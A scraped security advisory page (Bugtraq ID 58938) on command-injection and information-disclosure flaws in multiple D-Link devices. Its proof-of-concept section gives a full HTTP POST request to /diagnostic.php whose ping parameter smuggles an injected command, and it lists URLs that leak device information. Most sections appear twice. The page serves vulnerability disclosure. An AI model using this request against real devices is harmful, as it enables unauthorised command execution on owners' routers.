Multiple D-Link Products Command Injection and Multiple Information Disclosue Vulnerabilities
BID:58938
Info
Multiple D-Link Products Command Injection and Multiple Information Disclosue Vulnerabilities
| Bugtraq ID: | 58938 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 05 2013 12:00AM |
| Updated: | Apr 11 2013 05:28AM |
| Credit: | m-1-k-3 |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple D-Link Products Command Injection and Multiple Information Disclosue Vulnerabilities
Multiple D-Link products are prone to a command-injection vulnerability and multiple information-disclosure vulnerabilities.
Exploiting these issues could allow an attacker to gain access to potentially sensitive information and execute arbitrary commands in the context of the affected device.
Multiple D-Link products are prone to a command-injection vulnerability and multiple information-disclosure vulnerabilities.
Exploiting these issues could allow an attacker to gain access to potentially sensitive information and execute arbitrary commands in the context of the affected device.
Exploit / POC
Multiple D-Link Products Command Injection and Multiple Information Disclosue Vulnerabilities
An attacker can exploit these issues through a browser.
The following example URI, request and exploit code are available:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
act=ping&dst=%26%20COMMAND%26
http://www.example.com/DevInfo.txt or http://www.example.com/version.txt
An attacker can exploit these issues through a browser.
The following example URI, request and exploit code are available:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
act=ping&dst=%26%20COMMAND%26
http://www.example.com/DevInfo.txt or http://www.example.com/version.txt
Solution / Fix
Multiple D-Link Products Command Injection and Multiple Information Disclosue Vulnerabilities
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
References
Multiple D-Link Products Command Injection and Multiple Information Disclosue Vulnerabilities
References:
References:
- D-Link Homepage (D-Link)